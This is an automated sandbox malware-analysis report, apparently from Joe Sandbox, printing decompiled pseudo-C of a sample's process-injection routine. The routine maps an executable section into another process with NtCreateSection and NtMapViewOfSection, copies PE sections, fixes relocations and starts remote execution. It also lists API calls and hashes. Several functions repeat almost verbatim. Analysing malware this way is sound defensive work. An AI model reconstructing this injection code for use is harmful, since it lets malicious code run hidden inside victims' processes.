                                                          						 *_t100 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
                                                          						_t187 = _t201 - 0x58;
                                                          						if(NtCreateSection(_t187, 0xe, _t174, _t100, 0x40, 0x8000000, _t174) == 0 &&  *(_t201 - 8) != 0) {
                                                          							 *_t46 =  *(_t201 - 0x50);
                                                          							_t102 = _t201 - 0x48;
                                                          							 *_t102 = _t174;
                                                          							if(NtMapViewOfSection( *_t187, 0xffffffff, _t102, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                                                          								_t104 = _t201 - 0x40;
                                                          								 *_t104 = _t174;
                                                          								_t224 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t104, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 0x20);
                                                          								if(_t224 == 0) {
                                                          									L21();
                                                          									if(_t224 == 0 && _t224 != 0) {
                                                          									}
                                                          									_t207 = _t204 + 4;
                                                          									_push(0x2e62);
                                                          									_t208 = _t207 + 4;
                                                          									_push(0x2260);
                                                          									_t106 =  *_t208;
                                                          									_t209 = _t208 + 4;
                                                          									_t159 = (0x2260 << 5) + _t106;
                                                          									asm("lodsb");
                                                          									_t160 = _t159;
                                                          									asm("loop 0xffffffc2");
                                                          									_t161 = _t160 ^ 0xbcc951dd;
                                                          									_t204 = _t209 - _t161;
                                                          									_t192 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
                                                          									_t139 =  *(_t192 + 6) & 0x0000ffff;
                                                          									_push(_t192);
                                                          									_t162 = _t192;
                                                          									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                                                          										_t163 = _t162 + 0xf8;
                                                          										__eflags = _t163;
                                                          									} else {
                                                          										_t163 = _t162 + 0x108;
                                                          									}
                                                          									_push(_t139);
                                                          									_t140 =  *(_t163 + 0x10);
                                                          									if(_t140 != 0) {
                                                          										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t140);
                                                          										_t204 = _t204 + 0xc;
                                                          									}
                                                          									asm("loop 0xffffffe6");
                                                          									_pop(_t193);
                                                          									_t229 =  *((intOrPtr*)(_t201 - 0x34));
                                                          									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                                                          										_push(_t193);
                                                          										_t166 =  *((intOrPtr*)(_t193 + 0x34)) -  *(_t201 - 0x40);
                                                          										_t196 =  *((intOrPtr*)(_t193 + 0xa0)) +  *(_t201 - 0x48);
                                                          										__eflags = _t196;
                                                          										while(1) {
                                                          											__eflags =  *_t196;
                                                          											if( *_t196 == 0) {
                                                          												break;
                                                          											}
                                                          											_t176 =  *_t196;
                                                          											_t196 = _t196 + 8;
                                                          											asm("lodsw");
                                                          											__eflags = 0;
                                                          											if(0 != 0) {
                                                          												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
                                                          												__eflags =  *((intOrPtr*)(0 +  *(_t201 - 0x48) + _t176));
                                                          											}
                                                          											asm("loop 0xffffffe9");
                                                          										}
                                                          										_pop(_t197);
                                                          										_t174 = 0;
                                                          										__eflags = 0;
                                                          										_t108 = _t201 - 4;
                                                          										 *_t108 = 0;
                                                          										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t197 + 0x28)) +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t108, 0);
                                                          									} else {
                                                          										L54();
                                                          										_pop(_t177);
                                                          										_t174 = _t177 - 0x1760;
                                                          										 *((intOrPtr*)(_t174 + 0x1794)) = _t174 + 0x2c17;
                                                          										L00401227(_t128, _t174, _t229, _t174 + 0x2c17, 0x1ad);
                                                          										0x33();
                                                          										 *((intOrPtr*)(_t174 + 0x17b9)) = _t174 + 0x2c67;
                                                          										0x33();
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t91 = 0x14e3;
                                                          				_push(0x37f);
                                                          				_t131 =  *_t204;
                                                          				return L0040119E(_t91, _t131, _t174, _t229);
                                                          			}


                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: d6868da5ad0cc6704b0b456fa49984c9b80f10e5cd5d9e7629ddc67eaa61c955
                                                          • Instruction ID: 07d304ea65bb56911e0060c1c25482d61d12f4ba10f26ae25195bb01424c625b
                                                          • Opcode Fuzzy Hash: d6868da5ad0cc6704b0b456fa49984c9b80f10e5cd5d9e7629ddc67eaa61c955
                                                          • Instruction Fuzzy Hash: 345106B1900245BFEB219F91CC48FEBBBB9EF85B10F104129FA11AA2E5D7749941CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 282 4014da-4014f1 call 40119e 288 4014f3 282->288 289 4014f6-4014fb 282->289 288->289 291 401501-401512 289->291 292 401824-40182c 289->292 296 401822 291->296 297 401518-401541 291->297 292->289 295 401831-401842 292->295 299 401845-401866 call 40119e 295->299 300 401838-40183e 295->300 296->295 297->296 306 401547-40155e NtDuplicateObject 297->306 300->299 306->296 308 401564-401588 NtCreateSection 306->308 310 4015e4-40160a NtCreateSection 308->310 311 40158a-4015ab NtMapViewOfSection 308->311 310->296 314 401610-401614 310->314 311->310 313 4015ad-4015c9 NtMapViewOfSection 311->313 313->310 315 4015cb-4015e1 313->315 314->296 316 40161a-40163b NtMapViewOfSection 314->316 315->310 316->296 317 401641-40165d NtMapViewOfSection 316->317 317->296 319 401663 call 401668 317->319
                                                          C-Code - Quality: 62%
                                                          			E004014DA(void* __ebx, void* __edi, void* __eflags) {
                                                          				void* _t84;
                                                          				intOrPtr _t87;
                                                          				long _t90;
                                                          				void* _t91;
                                                          				struct _GUID _t98;
                                                          				struct _GUID _t100;
                                                          				PVOID* _t102;
                                                          				PVOID* _t104;
                                                          				intOrPtr _t106;
                                                          				intOrPtr* _t108;
                                                          				PVOID* _t121;
                                                          				PVOID* _t123;
                                                          				intOrPtr _t128;
                                                          				intOrPtr _t130;
                                                          				intOrPtr _t131;
                                                          				long* _t132;
                                                          				signed int _t139;
                                                          				int _t140;
                                                          				signed int _t159;
                                                          				signed int _t160;
                                                          				signed int _t161;
                                                          				void* _t162;
                                                          				intOrPtr* _t163;
                                                          				void* _t166;
                                                          				long _t174;
                                                          				intOrPtr _t176;
                                                          				void* _t177;
                                                          				long* _t183;
                                                          				intOrPtr* _t185;
                                                          				HANDLE* _t186;
                                                          				HANDLE* _t187;
                                                          				void* _t192;
                                                          				void* _t193;
                                                          				intOrPtr* _t196;
                                                          				void* _t197;
                                                          				void* _t200;
                                                          				void* _t201;
                                                          				intOrPtr* _t203;
                                                          				intOrPtr* _t204;
                                                          				void* _t207;
                                                          				intOrPtr* _t208;
                                                          				void* _t209;
                                                          				long _t224;
                                                          
                                                          				_pop(_t84);
                                                          				_push(0x37f);
                                                          				_t130 =  *_t203;
                                                          				_t204 = _t203 + 4;
                                                          				L0040119E(_t84, _t130, __edi, __eflags);
                                                          				_t128 =  *((intOrPtr*)(_t201 + 8));
                                                          				_t174 = 0;
                                                          				 *((intOrPtr*)(_t201 - 0x34)) = 0;
                                                          				if(gs != 0) {
                                                          					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
                                                          				}
                                                          				while(1) {
                                                          					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
                                                          					if(_t87 != 0) {
                                                          						break;
                                                          					}
                                                          					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                          				}
                                                          				 *((intOrPtr*)(_t201 - 0x5c)) = _t87;
                                                          				_t183 = _t201 - 0x60;
                                                          				 *_t183 = _t174;
                                                          				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t183);
                                                          				_t90 =  *_t183;
                                                          				if(_t90 != 0) {
                                                          					_t132 = _t201 - 0x30;
                                                          					 *_t132 = _t90;
                                                          					_t132[1] = _t174;
                                                          					_t185 = _t201 - 0x28;
                                                          					 *((intOrPtr*)(_t128 + 0x10))(_t185, 0x18);
                                                          					 *_t185 = 0x18;
                                                          					_push(_t201 - 0x30);
                                                          					_push(_t185);
                                                          					_push(0x40);
                                                          					_push(_t201 - 0x10);
                                                          					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, _t174, _t174, 2) == 0) {
                                                          						 *(_t201 - 8) = _t174;
                                                          						_t98 = _t201 - 0x50;
                                                          						 *(_t98 + 4) = _t174;
                                                          						 *_t98 = 0x5000;
                                                          						_t186 = _t201 - 0x54;
                                                          						if(NtCreateSection(_t186, 6, _t174, _t98, 4, 0x8000000, _t174) == 0) {
                                                          							 *_t25 =  *(_t201 - 0x50);
                                                          							_t121 = _t201 - 0x44;
                                                          							 *_t121 = _t174;
                                                          							if(NtMapViewOfSection( *_t186, 0xffffffff, _t121, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                                                          								_t123 = _t201 - 0x3c;
                                                          								 *_t123 = _t174;
                                                          								if(NtMapViewOfSection( *_t186,  *(_t201 - 0xc), _t123, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                                                          									_t200 =  *(_t201 - 0x44);
                                                          									 *((intOrPtr*)(_t128 + 0x20))(_t174, _t200, 0x104);
                                                          									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
                                                          									 *(_t201 - 8) =  *(_t201 - 8) + 1;
                                                          								}
                                                          							}
                                                          						}
                                                          						_t100 = _t201 - 0x50;
                                                          						 *(_t100 + 4) = _t174;
                                                          						 *_t100 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
                                                          						_t187 = _t201 - 0x58;
                                                          						if(NtCreateSection(_t187, 0xe, _t174, _t100, 0x40, 0x8000000, _t174) == 0 &&  *(_t201 - 8) != 0) {
                                                          							 *_t46 =  *(_t201 - 0x50);
                                                          							_t102 = _t201 - 0x48;
                                                          							 *_t102 = _t174;
                                                          							if(NtMapViewOfSection( *_t187, 0xffffffff, _t102, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                                                          								_t104 = _t201 - 0x40;
                                                          								 *_t104 = _t174;
                                                          								_t224 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t104, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 0x20);
                                                          								if(_t224 == 0) {
                                                          									L18();
                                                          									if(_t224 == 0 && _t224 != 0) {
                                                          									}
                                                          									_t207 = _t204 + 4;
                                                          									_push(0x2e62);
                                                          									_t208 = _t207 + 4;
                                                          									_push(0x2260);
                                                          									_t106 =  *_t208;
                                                          									_t209 = _t208 + 4;
                                                          									_t159 = (0x2260 << 5) + _t106;
                                                          									asm("lodsb");
                                                          									_t160 = _t159;
                                                          									asm("loop 0xffffffc2");
                                                          									_t161 = _t160 ^ 0xbcc951dd;
                                                          									_t204 = _t209 - _t161;
                                                          									_t192 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
                                                          									_t139 =  *(_t192 + 6) & 0x0000ffff;
                                                          									_push(_t192);
                                                          									_t162 = _t192;
                                                          									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                                                          										_t163 = _t162 + 0xf8;
                                                          										__eflags = _t163;
                                                          									} else {
                                                          										_t163 = _t162 + 0x108;
                                                          									}
                                                          									_push(_t139);
                                                          									_t140 =  *(_t163 + 0x10);
                                                          									if(_t140 != 0) {
                                                          										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t140);
                                                          										_t204 = _t204 + 0xc;
                                                          									}
                                                          									asm("loop 0xffffffe6");
                                                          									_pop(_t193);
                                                          									_t229 =  *((intOrPtr*)(_t201 - 0x34));
                                                          									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                                                          										_push(_t193);
                                                          										_t166 =  *((intOrPtr*)(_t193 + 0x34)) -  *(_t201 - 0x40);
                                                          										_t196 =  *((intOrPtr*)(_t193 + 0xa0)) +  *(_t201 - 0x48);
                                                          										__eflags = _t196;
                                                          										while(1) {
                                                          											__eflags =  *_t196;
                                                          											if( *_t196 == 0) {
                                                          												break;
                                                          											}
                                                          											_t176 =  *_t196;
                                                          											_t196 = _t196 + 8;
                                                          											asm("lodsw");
                                                          											__eflags = 0;
                                                          											if(0 != 0) {
                                                          												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
                                                          												__eflags =  *((intOrPtr*)(0 +  *(_t201 - 0x48) + _t176));
                                                          											}
                                                          											asm("loop 0xffffffe9");
                                                          										}
                                                          										_pop(_t197);
                                                          										_t174 = 0;
                                                          										__eflags = 0;
                                                          										_t108 = _t201 - 4;
                                                          										 *_t108 = 0;
                                                          										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t197 + 0x28)) +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t108, 0);
                                                          									} else {
                                                          										L51();
                                                          										_pop(_t177);
                                                          										_t174 = _t177 - 0x1760;
                                                          										 *((intOrPtr*)(_t174 + 0x1794)) = _t174 + 0x2c17;
                                                          										L00401227(_t128, _t174, _t229, _t174 + 0x2c17, 0x1ad);
                                                          										0x33();
                                                          										 *((intOrPtr*)(_t174 + 0x17b9)) = _t174 + 0x2c67;
                                                          										0x33();
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t91 = 0x14e3;
                                                          				_push(0x37f);
                                                          				_t131 =  *_t204;
                                                          				return L0040119E(_t91, _t131, _t174, _t229);
                                                          			}















































                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: 1846bf87db7033a62c75dde9dc562bd107ea8d68f2b408ae9b5850e6d891a0cc
                                                          • Instruction ID: fcafa90473e3bce6dbc0f334a66e4de9b25c1110b2005182b8d4e3deb893a7aa
                                                          • Opcode Fuzzy Hash: 1846bf87db7033a62c75dde9dc562bd107ea8d68f2b408ae9b5850e6d891a0cc
                                                          • Instruction Fuzzy Hash: 515107B1900245BFEB219F91CC48FEFBBB9EF85B10F104129FA11AA2A5D7709945CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 321 4014dd-4014f1 call 40119e 325 4014f3 321->325 326 4014f6-4014fb 321->326 325->326 328 401501-401512 326->328 329 401824-40182c 326->329 333 401822 328->333 334 401518-401541 328->334 329->326 332 401831-401842 329->332 336 401845-401866 call 40119e 332->336 337 401838-40183e 332->337 333->332 334->333 343 401547-40155e NtDuplicateObject 334->343 337->336 343->333 345 401564-401588 NtCreateSection 343->345 347 4015e4-40160a NtCreateSection 345->347 348 40158a-4015ab NtMapViewOfSection 345->348 347->333 351 401610-401614 347->351 348->347 350 4015ad-4015c9 NtMapViewOfSection 348->350 350->347 352 4015cb-4015e1 350->352 351->333 353 40161a-40163b NtMapViewOfSection 351->353 352->347 353->333 354 401641-40165d NtMapViewOfSection 353->354 354->333 356 401663 call 401668 354->356
                                                          C-Code - Quality: 63%
                                                          			E004014DD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                                                          				void* _t84;
                                                          				intOrPtr _t87;
                                                          				long _t90;
                                                          				void* _t91;
                                                          				struct _GUID _t98;
                                                          				struct _GUID _t100;
                                                          				PVOID* _t102;
                                                          				PVOID* _t104;
                                                          				intOrPtr _t106;
                                                          				intOrPtr* _t108;
                                                          				PVOID* _t121;
                                                          				PVOID* _t123;
                                                          				intOrPtr _t128;
                                                          				intOrPtr _t131;
                                                          				long* _t132;
                                                          				signed int _t139;
                                                          				int _t140;
                                                          				signed int _t160;
                                                          				signed int _t161;
                                                          				signed int _t162;
                                                          				void* _t163;
                                                          				intOrPtr* _t164;
                                                          				void* _t167;
                                                          				long _t175;
                                                          				intOrPtr _t177;
                                                          				void* _t178;
                                                          				long* _t184;
                                                          				intOrPtr* _t186;
                                                          				HANDLE* _t187;
                                                          				HANDLE* _t188;
                                                          				void* _t193;
                                                          				void* _t194;
                                                          				intOrPtr* _t197;
                                                          				void* _t198;
                                                          				void* _t201;
                                                          				void* _t202;
                                                          				intOrPtr* _t204;
                                                          				void* _t207;
                                                          				intOrPtr* _t208;
                                                          				void* _t209;
                                                          				long _t224;
                                                          
                                                          				L0040119E(_t84, __ecx, __edi, __eflags);
                                                          				_t128 =  *((intOrPtr*)(_t202 + 8));
                                                          				_t175 = 0;
                                                          				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                                                          				if(gs != 0) {
                                                          					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                                                          				}
                                                          				while(1) {
                                                          					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
                                                          					if(_t87 != 0) {
                                                          						break;
                                                          					}
                                                          					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                          				}
                                                          				 *((intOrPtr*)(_t202 - 0x5c)) = _t87;
                                                          				_t184 = _t202 - 0x60;
                                                          				 *_t184 = _t175;
                                                          				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t184);
                                                          				_t90 =  *_t184;
                                                          				if(_t90 != 0) {
                                                          					_t132 = _t202 - 0x30;
                                                          					 *_t132 = _t90;
                                                          					_t132[1] = _t175;
                                                          					_t186 = _t202 - 0x28;
                                                          					 *((intOrPtr*)(_t128 + 0x10))(_t186, 0x18);
                                                          					 *_t186 = 0x18;
                                                          					_push(_t202 - 0x30);
                                                          					_push(_t186);
                                                          					_push(0x40);
                                                          					_push(_t202 - 0x10);
                                                          					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t175, _t175, 2) == 0) {
                                                          						 *(_t202 - 8) = _t175;
                                                          						_t98 = _t202 - 0x50;
                                                          						 *(_t98 + 4) = _t175;
                                                          						 *_t98 = 0x5000;
                                                          						_t187 = _t202 - 0x54;
                                                          						if(NtCreateSection(_t187, 6, _t175, _t98, 4, 0x8000000, _t175) == 0) {
                                                          							 *_t25 =  *(_t202 - 0x50);
                                                          							_t121 = _t202 - 0x44;
                                                          							 *_t121 = _t175;
                                                          							if(NtMapViewOfSection( *_t187, 0xffffffff, _t121, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
                                                          								_t123 = _t202 - 0x3c;
                                                          								 *_t123 = _t175;
                                                          								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t123, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
                                                          									_t201 =  *(_t202 - 0x44);
                                                          									 *((intOrPtr*)(_t128 + 0x20))(_t175, _t201, 0x104);
                                                          									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                                                          									 *(_t202 - 8) =  *(_t202 - 8) + 1;
                                                          								}
                                                          							}
                                                          						}
                                                          						_t100 = _t202 - 0x50;
                                                          						 *(_t100 + 4) = _t175;
                                                          						 *_t100 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                                                          						_t188 = _t202 - 0x58;
                                                          						if(NtCreateSection(_t188, 0xe, _t175, _t100, 0x40, 0x8000000, _t175) == 0 &&  *(_t202 - 8) != 0) {
                                                          							 *_t46 =  *(_t202 - 0x50);
                                                          							_t102 = _t202 - 0x48;
                                                          							 *_t102 = _t175;
                                                          							if(NtMapViewOfSection( *_t188, 0xffffffff, _t102, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
                                                          								_t104 = _t202 - 0x40;
                                                          								 *_t104 = _t175;
                                                          								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t104, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 0x20);
                                                          								if(_t224 == 0) {
                                                          									L16();
                                                          									if(_t224 == 0 && _t224 != 0) {
                                                          									}
                                                          									_t207 = _t204 + 4;
                                                          									_push(0x2e62);
                                                          									_t208 = _t207 + 4;
                                                          									_push(0x2260);
                                                          									_t106 =  *_t208;
                                                          									_t209 = _t208 + 4;
                                                          									_t160 = (0x2260 << 5) + _t106;
                                                          									asm("lodsb");
                                                          									_t161 = _t160;
                                                          									asm("loop 0xffffffc2");
                                                          									_t162 = _t161 ^ 0xbcc951dd;
                                                          									_t204 = _t209 - _t162;
                                                          									_t193 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
                                                          									_t139 =  *(_t193 + 6) & 0x0000ffff;
                                                          									_push(_t193);
                                                          									_t163 = _t193;
                                                          									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                          										_t164 = _t163 + 0xf8;
                                                          										__eflags = _t164;
                                                          									} else {
                                                          										_t164 = _t163 + 0x108;
                                                          									}
                                                          									_push(_t139);
                                                          									_t140 =  *(_t164 + 0x10);
                                                          									if(_t140 != 0) {
                                                          										memcpy( *((intOrPtr*)(_t164 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t164 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
                                                          										_t204 = _t204 + 0xc;
                                                          									}
                                                          									asm("loop 0xffffffe6");
                                                          									_pop(_t194);
                                                          									_t229 =  *((intOrPtr*)(_t202 - 0x34));
                                                          									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                          										_push(_t194);
                                                          										_t167 =  *((intOrPtr*)(_t194 + 0x34)) -  *(_t202 - 0x40);
                                                          										_t197 =  *((intOrPtr*)(_t194 + 0xa0)) +  *(_t202 - 0x48);
                                                          										__eflags = _t197;
                                                          										while(1) {
                                                          											__eflags =  *_t197;
                                                          											if( *_t197 == 0) {
                                                          												break;
                                                          											}
                                                          											_t177 =  *_t197;
                                                          											_t197 = _t197 + 8;
                                                          											asm("lodsw");
                                                          											__eflags = 0;
                                                          											if(0 != 0) {
                                                          												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t167;
                                                          												__eflags =  *((intOrPtr*)(0 +  *(_t202 - 0x48) + _t177));
                                                          											}
                                                          											asm("loop 0xffffffe9");
                                                          										}
                                                          										_pop(_t198);
                                                          										_t175 = 0;
                                                          										__eflags = 0;
                                                          										_t108 = _t202 - 4;
                                                          										 *_t108 = 0;
                                                          										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t198 + 0x28)) +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t108, 0);
                                                          									} else {
                                                          										L49();
                                                          										_pop(_t178);
                                                          										_t175 = _t178 - 0x1760;
                                                          										 *((intOrPtr*)(_t175 + 0x1794)) = _t175 + 0x2c17;
                                                          										L00401227(_t128, _t175, _t229, _t175 + 0x2c17, 0x1ad);
                                                          										0x33();
                                                          										 *((intOrPtr*)(_t175 + 0x17b9)) = _t175 + 0x2c67;
                                                          										0x33();
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t91 = 0x14e3;
                                                          				_push(0x37f);
                                                          				_t131 =  *_t204;
                                                          				return L0040119E(_t91, _t131, _t175, _t229);
                                                          			}

                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: c7ae0998d8d661ccf688133248b2e1d84d0a8d2d586b58feb6ff111a8af814fa
                                                          • Instruction ID: c414ae2dcce1999d5ff69eab83f34e0e1241aa209a2fbae03b06ced14e898130
                                                          • Opcode Fuzzy Hash: c7ae0998d8d661ccf688133248b2e1d84d0a8d2d586b58feb6ff111a8af814fa
                                                          • Instruction Fuzzy Hash: 085106B1900249BFEF219F91CC48FEFBBB9EF85B10F104119FA11AA2A5D7709940CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (graph image not preserved; API calls named in the graph nodes: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA)
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0047024D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430978664.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_470000_cgjtubb.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: cess$kernel32.dll
                                                          • API String ID: 4275171209-1230238691
                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction ID: 16711ddd22fd0413336594a03f00dbfaf066cf36866d812deba6f11f0119f937
                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction Fuzzy Hash: 8D527974A01229DFDB64CF68C984BA9BBB1BF09304F1480DAE50DAB351DB34AE85DF15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (graph image not preserved; nodes 470e0f-470e2c, with SetErrorMode called twice)
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00000400,?,?,00470223,?,?), ref: 00470E19
                                                          • SetErrorMode.KERNELBASE(00000000,?,?,00470223,?,?), ref: 00470E1E
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430978664.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                                                          Joe Sandbox IDA Plugin
